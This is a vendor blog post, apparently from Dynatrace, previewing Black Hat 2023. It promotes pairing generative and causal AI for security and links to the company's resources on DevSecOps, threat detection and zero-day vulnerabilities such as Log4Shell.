Black Hat 2023: Pairing causal AI and generative AI for cybersecurity threats

This year’s big-bang moment has been the surge in generative AI, such as ChatGPT. Generative AI can boost organizational productivity. Based on large language models (LLMs), generative AI can help those in communication and creative fields to enable live chat between customer reps and consumers, to create product descriptions automatically and on the fly, or even to detect fraud in financial services settings. Developers use generative AI to find errors in code and automatically document their code. They can also use generative AI for cybersecurity, write prototype code, and implement complex software systems.

But as the Black Hat 2023 agenda indicates, generative AI also introduces new security risks. According to the agenda, “AI’s capabilities can be a double-edged sword—a potent tool for both advancing the effectiveness of our existing security products and the emergence of more sophisticated threats.”

How will organizations and cybersecurity teams keep up with the “relentless pace of AI development,” as the keynote asks? Will generative AI multiply existing attack surfaces? And how can cybersecurity teams adjust to using generative AI to their advantage?

Pairing generative AI with causal AI

One key strategy is to pair generative AI with causal AI, providing organizations with better-quality data and answers as they make key decisions. Because generative AI is probabilistic in nature, its value depends on the quality of data that trains its algorithms and prompts. As a result, the power of generative AI can be amplified by causal AI and predictive intelligence.

“This combined approach provides reliable answers for two key purposes,” wrote Dynatrace CTO Bernd Greifeneder in a May 2023 blog post. “First, to drive trustworthy automation that is deterministic and repeatable through causal AI. Second, for causal AI to provide a deep and rich context to unleash GPT’s full potential for software delivery and productivity use cases.”

As cybersecurity teams look to identify malicious activity, the twin prongs of generative and causal AI provide a better foundation of quality data to identify and resolve security threats. These are just some of the themes we will explore in our guide for Black Hat 2023, which takes place August 5-10 in Las Vegas. Visit our booth, number #2608, at Black Hat and check out our guide below.

AI for cybersecurity

Enterprises need a better solution for identifying security vulnerabilities that present the greatest risk. They also need an easy-to-digest way to prioritize which vulnerabilities to address first and those that pose less risk.

When security software incorporates AI—with predictive and historical investigation capabilities—security analysts can hunt for hidden threats with lightning-fast queries and use the resulting insights to automatically trigger a response to a security problem.

Security teams can create automations and workflows to assess the impact of an attack and find the indicators of compromise (IOCs). These precise answers and intelligent automations free security analysts from manual activities and enable them to focus on innovating.

Teams need a solution that can identify security risks and prioritize remediation steps. This vulnerability assessment can happen in real time with no manual effort. Check out the following resources to learn more.

	Dynatrace Unveils Security Analytics, Providing Actionable Insights for Proactive Defense Against Threats to Cloud Applications – press release Dynatrace® Security Analytics enables threat hunting and real-time detection and incident response.
	TTP-based threat hunting with Dynatrace Security Analytics and Falco Alerts solves alert noise – blog Security analysts are turning to AI and TTP-based threat-hunting techniques to uncover how attackers are trying to exploit their environments.
	Dynatrace unveils Security Analytics to elevate threat detection, forensics, and incident response – blog Dynatrace Security Analytics enables threat detection, forensics, and incident response using combined security and observability context across the full stack.
	What is vulnerability management? And why runtime vulnerability detection makes the difference – blog Vulnerability management is an essential part of securing IT operations. But managing the breadth of the vulnerabilities that can put your systems at risk is challenging.
	Dynatrace Application Security automatically detects and blocks attacks in real time – blog Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.
	Dynatrace enhances application security with AI-powered vulnerability prioritization – press release New Davis Security Advisor automatically contextualizes and prioritizes application vulnerabilities to reduce enterprise risk.

Observability for effective DevSecOps

Traditional approaches to application security can fail to keep up with the complexity of cloud-native environments and rapid software release cycles. As organizations hasten software development to remain competitive, security vulnerabilities can make their way into live applications because developers simply don’t have time to find and fix them. To address this, organizations are integrating DevOps and security, or “DevSecOps,” to detect and respond to software vulnerabilities in development and production faster and more efficiently.

To effectively advance DevSecOps maturity, teams can use observability data in context to take actions that strengthen defenses. Securing cloud-native applications at runtime combined with intelligent automation ensures that DevSecOps teams can address security concerns early in the software development lifecycle as well as in production. This approach helps organizations strengthen their application security so they can better protect users and the business from cyberattacks, including zero-day attacks and data breaches.

Learn more about securing modern applications and infrastructure and how to integrate security analytics into your DevSecOps initiative with the following resources.

	Dynatrace Application Security automatically detects and blocks attacks in real time – blog Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.
	What is DevSecOps? And what you need to do it well – blog DevSecOps connects three different disciplines: development, security, and operations. Learn how security improves DevOps.
	Best practices for building a strong DevSecOps maturity model – blog How can businesses effectively implement best practices to align with the evolving DevSecOps maturity model? Here’s what you need to know.
	‘Security as code’ demands proactive DevSecOps – blog Learn what “security as code” is, how to build a “security as code” culture, and why organizations must adopt a proactive DevSecOps stance.
	DevSecOps automation improves application security in multicloud environments – blog DevSecOps automation is essential for ensuring application security in multicloud environments. Learn how to automate DevSecOps at scale.
	DevOps vs DevSecOps: Why integrate security and DevOps? – blog Understand the difference between DevOps and DevSecOps. See how incorporating security practices into delivery workflows pays off.
	Automated DevSecOps release validation ensures security by default – blog In modern cloud-native environments, which rely on microservices architectures, application teams that are responsible for innovation face some dilemmas.

Cybersecurity analytics and observability in context for threat detection and response

Cybersecurity analytics and forensics is the practice of investigating security incidents, often based on log data – an essential element for securing cloud-native applications and infrastructure. However, as more organizations adopt cloud-native environments, log data alone isn’t enough to detect critical evidence of exploitation activity.

Often, organizations aren’t even aware they’ve experienced a security attack. This lack of awareness means that organizations run the risk of bad actors repeatedly exploiting the same attack vector. The massive volumes of log data associated with a breach can make effective cybersecurity forensics complicated and costly. To speed detection and streamline remediation, organizations need detailed insight into security issues across their environments and applications.

As security teams seek to understand malicious events, the importance of unified observability in context compounds. Additionally, historical data about an incident is invaluable, enabling quick and precise answers about when the malicious activity occurred, when the vulnerability was first seen in the systems, what was attempted, and if the attackers were successful. Security analysts need to be able to respond to escalating cyber threats—such as the recent MOVEit vulnerability—as well as execute investigations and forensics fast, based on automation, observability context, and security data combined.

To learn more about leveraging observability and cybersecurity analytics to protect your organization from cyber threats, check out the following resources.

	MOVEit vulnerability: Observability context fills log data gaps for MOVEit Transfer vulnerability – blog MOVEit vulnerability investigations are exposing gaps in logs and payloads. But observability context can reveal hidden exploit evidence.
	Log auditing and log forensics benefit from converging observability and security data – blog Cloud complexity challenges log auditing and log forensics. Converging observability and security data provides real-time answers at scale.
	Log forensics: Finding malicious activity in multicloud environments with Dynatrace Grail – blog Log forensics is easy with Dynatrace Grail, the indexless, schema-on-read data lakehouse. This demo walks through how it works.
	Dynatrace Application Security automatically detects and blocks attacks in real time – blog Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.
	Runtime vulnerability management is still a vexing challenge for organizations – blog Runtime vulnerability management threats continue to hamper organizations as they release code faster. A new CISO report explains why.

Zero-day attacks

With organizations investing in their online presence, cyber attackers are taking advantage of organizations’ digitization. Increased attacks, such as Log4Shell and Spring4Shell, are wreaking havoc on organizations, their sensitive data, and software supply chains.

By definition, zero-day attacks take organizations by surprise. “Zero day” means bad actors discover and exploit security vulnerabilities before experts learn about them. As a result, teams have “0 days” to remediate such issues and are always at risk. While IT teams can be diligent at identifying vulnerabilities, these weaknesses are difficult to detect. Also, attackers can almost always find a loophole using strategies like phishing scams, watering hole attacks, business email compromise attacks, malicious sites, unauthorized access, and more.

Check out these resources to learn more about these attacks and how you can protect your organization.

	Protect your organization against zero-day vulnerabilities – blog Zero-day vulnerabilities put organizations’ data at risk. Learn how to ward off these vulnerabilities to protect your data from zero-day attacks.
	Why software supply chain attacks are increasing – blog Myriad software supply chain attacks continue to plague the global flow of goods. Here’s how modern observability takes aim at cybersecurity risks.
	3 DevSecOps practices to minimize the impact of the next Log4Shell – article Important lessons from Log4Shell – a critical vulnerability that left much of the IT world vulnerable to zero-day attacks.
	What is Log4Shell? The Log4j vulnerability explained (and what to do about it) – blog The Log4j vulnerabilities have triggered millions of exploit attempts of the Log4j 2 library. Learn all you need to know about Log4Shell.
	How Dynatrace uses Dynatrace to combat the Log4j vulnerability (Log4Shell) – blog As a result of the Log4j vulnerability, the Dynatrace security team explains how they use the Dynatrace platform to stay ahead of the impact.
	Log4Shell highlights the need for secure digital transformation – blog Modern observability and vulnerability management gave Avisi the secure digital transformation strategy they needed to conquer Log4Shell.
	Spring4Shell: Detect and mitigate new zero-day vulnerabilities in the Java Spring Framework – blog Spring4Shell vulnerabilities expose Java Spring Framework apps to exploitation. Learn how to prevent its effects—and those of similar vulnerabilities.